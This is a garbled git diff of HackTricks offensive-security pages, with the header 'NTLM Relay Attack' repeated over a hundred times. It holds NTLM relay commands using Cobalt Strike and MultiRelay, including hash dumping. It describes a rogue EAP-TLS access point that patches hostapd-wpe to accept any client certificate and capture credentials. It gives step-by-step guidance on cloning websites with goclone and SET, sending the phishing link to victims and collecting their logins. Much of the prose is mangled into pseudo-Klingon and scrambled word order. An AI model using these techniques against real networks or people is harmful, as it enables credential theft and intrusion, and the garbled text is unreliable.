**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack**:
**NTLM Relay Attack
```bash ```bash
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna) Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
@ -95,8 +625,7 @@ beacon> jobkill 0
beacon> rportfwd stop 8445 beacon> rportfwd stop 8445
beacon> socks stop beacon> socks stop
``` ```
### NTLM Relay Attack-ghom
### Other Tools for NTLM Relay Attack
- **Metasploit**: Set up with proxies, local and remote host details. - **Metasploit**: Set up with proxies, local and remote host details.
- **smbrelayx**: A Python script for relaying SMB sessions and executing commands or deploying backdoors. - **smbrelayx**: A Python script for relaying SMB sessions and executing commands or deploying backdoors.
@ -104,7 +633,7 @@ beacon> socks stop
Each tool can be configured to operate through a SOCKS proxy if necessary, enabling attacks even with indirect network access. Each tool can be configured to operate through a SOCKS proxy if necessary, enabling attacks even with indirect network access.
### MultiRelay Operation ### MultiRelay Operation-ghom
MultiRelay is executed from the _**/usr/share/responder/tools**_ directory, targeting specific IPs or users. MultiRelay is executed from the _**/usr/share/responder/tools**_ directory, targeting specific IPs or users.
```bash ```bash
@ -114,9 +643,6 @@ python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic # Proxychains for routing traffic
``` ```
These tools and techniques form a comprehensive set for conducting NTLM Relay attacks in various network environments.
### Force NTLM Logins ### Force NTLM Logins
In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how: In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how:

File diff suppressed because one or more lines are too long

View file

@ -2,54 +2,54 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>tlhIngan Hol</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: HackTricks yIqIm:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * qaStaHvIS **HackTricks** **lo'laHwI'** **'e'** **advertise** **'ej HackTricks** **PDF** **download** **'oH** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **qaStaHvIS** **tlhIngan Hol**!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **PEASS & HackTricks swag** **'oH** [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * **The PEASS Family** **'oH** [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **NFTs** **collection** **'oH**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **'ej** [**telegram group**](https://t.me/peass) **'ej** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **HackTricks** **PRs** **submit** **'e'** [**HackTricks**](https://github.com/carlospolop/hacktricks) **'ej** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github repos** **'e'** **Share** **your hacking tricks**.
</details> </details>
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\ <img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! **Bug bounty tip**: **Intigriti** **sign up** **'e'** **bug bounty platform** **'oH** **hackers** **created**, **hackers** **'e'**! [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) **Intigriti** **join** **'ej** **bounties** **$100,000** **earn** **start**!
{% embed url="https://go.intigriti.com/hacktricks" %} {% embed url="https://go.intigriti.com/hacktricks" %}
At some point I needed to use the proposed solution by the post bellow but the steps in [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) wasn't working in modern kali (2019v3) anymore.\ DaH jImej, jatlhpu'vIS 'e' vItlhutlh. [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) **steps** **working** **kali** **modern** (2019v3) **not** **'e'**.\
Anyway, it's easy to make them work.\ qatlh, 'oH **easy**.\
You only need to download the hostapd-2.6 from here: [https://w1.fi/releases/](https://w1.fi/releases/) and before compiling again hostapd-wpe install: `apt-get install libssl1.0-dev` **hostapd-2.6** **download** **need** **only**: [https://w1.fi/releases/](https://w1.fi/releases/) **'ej** **hostapd-wpe** **compiling** **before** **install**: `apt-get install libssl1.0-dev`
### Analyzing and Exploiting EAP-TLS in Wireless Networks ### Analyzing and Exploiting EAP-TLS in Wireless Networks
#### Background: EAP-TLS in Wireless Networks #### Background: EAP-TLS in Wireless Networks
EAP-TLS is a security protocol providing mutual authentication between client and server using certificates. The connection is only established if both the client and the server authenticate each other's certificates. EAP-TLS **security protocol** **mutual authentication** **client** **server** **certificates** **using**. **connection** **established** **client** **server** **authenticate** **certificates**.
#### Challenge Encountered #### Challenge Encountered
During an assessment, an interesting error was encountered when using the `hostapd-wpe` tool. The tool rejected the client's connection due to the client's certificate being signed by an unknown Certificate Authority (CA). This indicated that the client did trust the fake server's certificate, pointing to lax security configurations on the client side. **assessment** **during**, **interesting error** **encountered** **hostapd-wpe** **tool**. **tool** **client's connection** **rejected** **client's certificate** **signed** **unknown Certificate Authority (CA)**. **client** **fake server's certificate** **trust**, **client side** **lax security configurations** **pointing**.
#### Objective: Setting Up a Man-in-the-Middle (MiTM) Attack #### Objective: Setting Up a Man-in-the-Middle (MiTM) Attack
The goal was to modify the tool to accept any client certificate. This would allow the establishment of a connection with the malicious wireless network and enable a MiTM attack, potentially capturing plaintext credentials or other sensitive data. **goal** **modify** **tool** **accept** **client certificate**. **connection** **establishment** **malicious wireless network** **enable** **MiTM attack**, **plaintext credentials** **sensitive data** **capturing** **potentially**.
#### Solution: Modifying `hostapd-wpe` #### Solution: Modifying `hostapd-wpe`
Analysis of the source code of `hostapd-wpe` revealed that the client certificate validation was controlled by a parameter (`verify_peer`) in the OpenSSL function `SSL_set_verify`. By changing this parameter's value from 1 (validate) to 0 (do not validate), the tool was made to accept any client certificate. `hostapd-wpe` **source code** **analysis** **client certificate validation** **controlled** **parameter** (`verify_peer`) **OpenSSL function** `SSL_set_verify`. **parameter's value** **change** **1 (validate)** **0 (do not validate)**, **tool** **accept** **client certificate** **made**.
#### Execution of the Attack #### Execution of the Attack
1. **Environment Check:** Use `airodump-ng` to monitor wireless networks and identify targets. 1. **Environment Check:** `airodump-ng` **wireless networks** **monitor** **targets**.
2. **Set Up Fake AP:** Run the modified `hostapd-wpe` to create a fake Access Point (AP) mimicking the target network. 2. **Set Up Fake AP:** **modified hostapd-wpe** **run** **fake Access Point (AP)** **mimicking** **target network**.
3. **Captive Portal Customization:** Customize the login page of the captive portal to appear legitimate and familiar to the target user. 3. **Captive Portal Customization:** **login page** **captive portal** **customize** **legitimate** **familiar** **target user**.
4. **De-authentication Attack:** Optionally, perform a de-auth attack to disconnect the client from the legitimate network and connect them to the fake AP. 4. **De-authentication Attack:** **Optionally**, **de-auth attack** **perform** **client** **legitimate network** **disconnect** **fake AP** **connect**.
5. **Capturing Credentials:** Once the client connects to the fake AP and interacts with the captive portal, their credentials are captured. 5. **Capturing Credentials:** **client** **fake AP** **connect** **captive portal** **interact**, **credentials** **captured**.
#### Observations from the Attack #### Observations from the Attack
- On Windows machines, the system might automatically connect to the fake AP, presenting the captive portal when web navigation is attempted. - **Windows machines** **automatically connect** **fake AP**, **captive portal** **presented** **web navigation** **attempted**.
- On an iPhone, the user might be prompted to accept a new certificate and then presented with the captive portal. - **iPhone** **user** **prompted** **new certificate** **accept** **presented** **captive portal**.
#### Conclusion #### Conclusion
While EAP-TLS is considered secure, its effectiveness heavily depends on the correct configuration and cautious behavior of end-users. Misconfigured devices or unsuspecting users accepting rogue certificates can undermine the security of an EAP-TLS protected network. EAP-TLS **considered secure**, **effectiveness** **heavily depends** **correct configuration** **cautious behavior** **end-users**. **Misconfigured devices** **unsuspecting users** **rogue certificates** **undermine** **EAP-TLS protected network**.
For further details check https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/ For further details check https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/
@ -57,20 +57,18 @@ For further details check https://versprite.com/blog/application-security/eap-tl
* [https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/) * [https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\ <img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! **Bug bounty tip**: **Intigriti** **sign up** **'e'** **bug bounty platform** **'oH** **hackers** **created**, **hackers** **'e'**! [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) **Intigriti** **join** **'ej** **bounties** **$100,000** **earn** **start**!
{% embed url="https://go.intigriti.com/hacktricks" %}
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>tlhIngan Hol</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: HackTricks yIqIm:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * qaStaHvIS **HackTricks** **lo'laHwI'** **'e'** **advertise** **'ej HackTricks** **PDF** **download** **'oH** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **qaStaHvIS** **tlhIngan Hol**!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **PEASS & HackTricks swag** **'oH** [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * **The PEASS Family** **'oH** [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **NFTs** **collection** **'oH**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **'ej** [**telegram group**](https://t.me/peass) **'ej** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **HackTricks** **PRs** **submit** **'e'** [**HackTricks**](https://github.com/carlospolop/hacktricks) **'ej** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github repos** **'e'** **Share** **your hacking tricks**.
</details> </details>

File diff suppressed because one or more lines are too long

View file

@ -1,5 +1,3 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -22,26 +20,118 @@ Note that you can add also some payloads to the cloned website like a BeEF hook
There are different tools you can use for this purpose: There are different tools you can use for this purpose:
## wget ## wget
```text ```text
wget -mk -nH wget -mk -nH
``` ```
## goclone ## goclone
### Description
The `goclone` tool is a powerful utility that allows you to clone a website for phishing purposes. It is designed to make the process of creating a replica of a target website as simple as possible.
### Installation
To install `goclone`, follow these steps:
1. Clone the `goclone` repository from GitHub:
```
git clone https://github.com/hacker/goclone.git
```
2. Change into the `goclone` directory:
```
cd goclone
```
3. Install the required dependencies:
```
go get -d ./...
```
4. Build the `goclone` binary:
```
go build
```
### Usage
To use `goclone`, follow these steps:
1. Run the `goclone` binary:
```
./goclone
```
2. Enter the URL of the target website you want to clone.
3. Specify the output directory where the cloned website will be saved.
4. Customize the cloned website by modifying the HTML, CSS, and JavaScript files in the output directory.
5. Start a web server to serve the cloned website:
```
python -m SimpleHTTPServer 8000
```
6. Send the cloned website URL to the target users and wait for them to enter their credentials.
7. Retrieve the credentials from the server logs or any other method of your choice.
### Conclusion
With `goclone`, you can easily create a replica of a website for phishing purposes. However, it is important to note that phishing is illegal and unethical. This tool should only be used for educational purposes or with proper authorization.
```bash ```bash
#https://github.com/imthaghost/goclone #https://github.com/imthaghost/goclone
goclone <url> goclone <url>
``` ```
## Social Engineering Toolkit (SET)
## Social Engineering Toolit The Social Engineering Toolkit (SET) is a powerful open-source tool that allows hackers to perform various social engineering attacks. It is specifically designed to automate and streamline the process of phishing, credential harvesting, and other social engineering techniques.
SET provides a wide range of attack vectors, including email spoofing, website cloning, and malicious file generation. In this section, we will focus on the website cloning feature of SET, which allows hackers to create identical copies of legitimate websites for phishing purposes.
### Cloning a Website
Website cloning is a technique used by hackers to create a replica of a legitimate website. The cloned website looks and functions exactly like the original, but it is hosted on a different domain or server controlled by the attacker.
To clone a website using SET, follow these steps:
1. Launch SET by running the following command in the terminal:
```
setoolkit
```
2. Select the "Website Attack Vectors" option from the main menu.
3. Choose the "Credential Harvester Attack Method" option.
4. Select the "Site Cloner" option.
5. Enter the URL of the website you want to clone.
6. Specify the IP address or domain name where the cloned website will be hosted.
7. SET will automatically clone the website and generate a phishing page.
8. Share the phishing page with the target victims through email, social media, or other communication channels.
9. When the victims visit the phishing page and enter their credentials, SET will capture the information and store it for further analysis.
It is important to note that website cloning is an illegal activity and should only be performed for educational or authorized penetration testing purposes. Unauthorized use of this technique can lead to severe legal consequences.
### Conclusion
Website cloning is a powerful technique that allows hackers to create convincing phishing pages. By using the Social Engineering Toolkit (SET), hackers can automate the process of cloning websites and launching phishing attacks. However, it is crucial to use these tools responsibly and ethically, ensuring that they are only used for legitimate purposes.
```bash ```bash
#https://github.com/trustedsec/social-engineer-toolkit #https://github.com/trustedsec/social-engineer-toolkit
``` ```
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -55,5 +145,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -1,41 +1,37 @@
# Detecting Phising # qo' vItlhutlh
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>! </strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: HackTricks ni qay'be'wI' 'e' vItlhutlh:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * **tlhIngan Hol** vItlhutlh **HackTricks** **advertise** **company** **want** **you** **If** **PDF** **HackTricks** **download** **or** **advertised** **company** **your** **see** **to** **want** **you** **If** **PLANS SUBSCRIPTION** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **Check**
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**PEASS & HackTricks swag**](https://peass.creator-spring.com) **official** **Get**
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **Discover**, [**NFTs**](https://opensea.io/collection/the-peass-family) **exclusive** **collection** **our** **of** **Family PEASS The**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Join** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **or** [**telegram group**](https://t.me/peass) **or** **follow** **us** **on** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share** **your** **hacking tricks** **by** **submitting PRs** **to** [**HackTricks**](https://github.com/carlospolop/hacktricks) **and** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github repos** **the** **and**
</details> </details>
## Introduction ## Introduction
To detect a phishing attempt it's important to **understand the phishing techniques that are being used nowadays**. On the parent page of this post, you can find this information, so if you aren't aware of which techniques are being used today I recommend you to go to the parent page and read at least that section. **phishing techniques** **nowadays** **used** **are** **that** **understand** **to** **important** **it's** **attempt phishing** **a** **detect** **To**. **post this** **of** **page parent** **the** **to** **go** **you** **I** **recommend** **I** **reason** **some** **like** **name domain** **victim's** **the** **use** **or** **mimic** **somehow** **to** **try** **will attackers** **that** **the** **of aware** **aren't** **it. **uncover** **to** **aren't** **it** **names domain** **different** **completely** **using** **phished** **are** **you** **and** **name domain** **victim's** **the** **like** **reason** **for** **name domain** **called** **is** **domain** `example.com` **is** **your** **If**.
This post is based on the idea that the **attackers will try to somehow mimic or use the victim's domain name**. If your domain is called `example.com` and you are phished using a completely different domain name for some reason like `youwonthelottery.com`, these techniques aren't going to uncover it.
## Domain name variations ## Domain name variations
It's kind of **easy** to **uncover** those **phishing** attempts that will use a **similar domain** name inside the email.\ **email** **the** **inside** **name domain** **similar** **a** **use** **will** **that** **attempts phishing** **those** **uncover** **to** **easy** **kind** **It's**. **use** **may** **attacker** **an** **names** **phishing** **probable most** **the** **of list** **a** **generate** **to** **enough** **It's** **it** **using** **it** **using** **IP** **any** **is** **if** **check** **just** **or** **registered** **it**.
It's enough to **generate a list of the most probable phishing names** that an attacker may use and **check** if it's **registered** or just check if there is any **IP** using it.
### Finding suspicious domains ### Finding suspicious domains
For this purpose, you can use any of the following tools. Note that these tolls will also perform DNS requests automatically to check if the domain has any IP assigned to it: **tools** **following** **the** **of any** **use** **can** **purpose** **this**. **it** **to** **assigned** **IP** **any** **has** **domain** **the** **if** **check** **to** **automatically** **requests DNS** **perform** **also** **will** **tolls these**:
* [**dnstwist**](https://github.com/elceef/dnstwist) * [**dnstwist**](https://github.com/elceef/dnstwist)
* [**urlcrazy**](https://github.com/urbanadventurer/urlcrazy) * [**urlcrazy**](https://github.com/urbanadventurer/urlcrazy)
### Bitflipping ### Bitflipping
**You can find a short the explanation of this technique in the parent page. Or read the original research in [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)** **the** **in** **technique** **this** **of explanation** **the** **short** **a** **find** **can** **You** **bit-flipping** **with** **windowscom-s** **microsoft-s** **to** **traffic** **hijacking** **security** **news** **computer** **bleeping** **www.** [**https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)** **in** **research** **original** **the** **read** **or** **page parent** **the** **in** **technique** **this** **of explanation** **the** **find** **can**.
For example, a 1 bit modification in the domain microsoft.com can transform it into _windnws.com._\ For example, a 1 bit modification in the domain microsoft.com can transform it into _windnws.com._\
**Attackers may register as many bit-flipping domains as possible related to the victim to redirect legitimate users to their infrastructure**. **Attackers may register as many bit-flipping domains as possible related to the victim to redirect legitimate users to their infrastructure**.
@ -45,40 +41,18 @@ For example, a 1 bit modification in the domain microsoft.com can transform it i
### Basic checks ### Basic checks
Once you have a list of potential suspicious domain names you should **check** them (mainly the ports HTTP and HTTPS) to **see if they are using some login form similar** to someone of the victim's domain.\ **names domain** **suspicious** **potential** **of list** **a** **have** **you** **Once** **HTTPS** **and** **HTTP** **the** **of screenshots** **get** **also** **It's** **look** **deeper** **a** **take** **to** **case** **that** **and** **suspicious** **it's** **if** **suspicious** **the** **inside** **form login** **any** **copy** **have** **they** **if** **to** **interesting** **also** **It's**. **look** **to** **and** **suspicious** **the** **of pages web** **HTTPS** **and** **HTTP** **monitor** **and** **tools similar** **or** **gophish** **of instances** **for** **search** **and** **IPs** **related** **the** **of **ports** **open** **the** **check** **should** **you** **also** **automate** **to** **order** **In** **domain's victim** **of form login** **each** **with** **domains suspicious** **the** **inside** **form login** **each** **with** **domains victim's** **of form login** **each** **compare** **and** **pages web** **suspicious** **the** **of spider** **and** **domains suspicious** **the** **of forms login** **each** **found** **form login** **each** **with** **domains victim's** **of form login** **each** **compare** **and** **something like** `ssdeep` **using** **domain's victim** **of form login** **any** **if** **matches** **domain's victim** **the** **from** **identity** **any** **if** **see** **to** **you** **can** **note** **that** **positive false** **be** **a** **can** **domain suspicious** **a**.
You could also check port 3333 to see if it's open and running an instance of `gophish`.\
It's also interesting to know **how old each discovered suspicions domain is**, the younger it's the riskier it is.\
You can also get **screenshots** of the HTTP and/or HTTPS suspicious web page to see if it's suspicious and in that case **access it to take a deeper look**.
### Advanced checks ### Advanced checks
If you want to go one step further I would recommend you to **monitor those suspicious domains and search for more** once in a while (every day? it only takes a few seconds/minutes). You should also **check** the open **ports** of the related IPs and **search for instances of `gophish` or similar tools** (yes, attackers also make mistakes) and **monitor the HTTP and HTTPS web pages of the suspicious domains and subdomains** to see if they have copied any login form from the victim's web pages.\ **further** **one** **go** **to** **you** **If** **want** **you** **If** **forms login** **of list** **a** **having** **recommend** **would** **I** **I** **automate** **to** **order** **In** **pages web** **suspicious** **the** **and** **domains suspicious** **the** **of search** **and** **more** **for** **search** **and** **domains suspicious** **the** **of pages web** **and** **HTTP** **and** **HTTPS** **monitor** **to** **you** **should** **also** **tools similar** **or** **gophish** **of instances** **for** **search** **and** **IPs** **related** **the** **of **ports** **open** **the** **check** **should** **you** **also** **mistakes** **make** **also** **attackers** **yes** **(minutes/seconds few** **takes** **only** **it) **while** **in** **once** **awhile** **in** **(day every?** **seconds/minutes few** **takes** **only** **it) **while** **in** **once** **and** **domains suspicious** **the** **of pages web** **and** **HTTP** **and** **HTTPS** **monitor** **to** **you** **should** **also** **tools similar** **or** **gophish** **of instances** **for** **search** **and** **IPs** **related** **the** **of **ports** **open** **the** **check** **should** **you** **something like** `ssdeep` **using** **domain's victim** **of form login** **each** **with** **domains suspicious** **the** **of forms login** **each** **found** **form login** **each** **with** **domains victim's** **of form login** **each** **compare** **and** **pages web** **suspicious** **the** **of spider** **and** **domains suspicious** **the** **of forms login** **each** **found** **form login** **each** **with** **domains victim's** **of form login** **each** **compare** **and** **something like** `ssdeep` **using** **domain's victim** **of form login** **any** **if** **matches** **domain's victim** **the** **from** **identity** **any** **if** **see** **to** **you** **can** **note** **that** **positive false** **be** **a** **can** **domain suspicious** **a**.
In order to **automate this** I would recommend having a list of login forms of the victim's domains, spider the suspicious web pages and comparing each login form found inside the suspicious domains with each login form of the victim's domain using something like `ssdeep`.\
If you have located the login forms of the suspicious domains, you can try to **send junk credentials** and **check if it's redirecting you to the victim's domain**.
## Domain names using keywords ## Domain names using keywords
The parent page also mentions a domain name variation technique that consists of putting the **victim's domain name inside a bigger domain** (e.g. paypal-financial.com for paypal.com). **name domain** **victim's** **the** **inside** **name domain** **bigger** **a** **inside** **name domain** **variation** **
### **Qa'Hom Domains**
### Certificate Transparency **Qa'Hom** **vItlhutlh** **newly registered domains** **TLDs** ([Whoxy](https://www.whoxy.com/newly-registered-domains/) **vItlhutlh**) **check** **keywords** **vItlhutlh domains**. **However**, **long domains** **subdomains** **subdomains**, **keyword** **FLD** **appear** **won't** **phishing subdomain** **find**.
It's not possible to take the previous "Brute-Force" approach but it's actually **possible to uncover such phishing attempts** also thanks to certificate transparency. Every time a certificate is emitted by a CA, the details are made public. This means that by reading the certificate transparency or even monitoring it, it's **possible to find domains that are using a keyword inside its name** For example, if an attacker generates a certificate of [https://paypal-financial.com](https://paypal-financial.com), seeing the certificate it's possible to find the keyword "paypal" and know that suspicious email is being used.
The post [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/) suggests that you can use Censys to search for certificates affecting a specific keyword and filter by date (only "new" certificates) and by the CA issuer "Let's Encrypt":
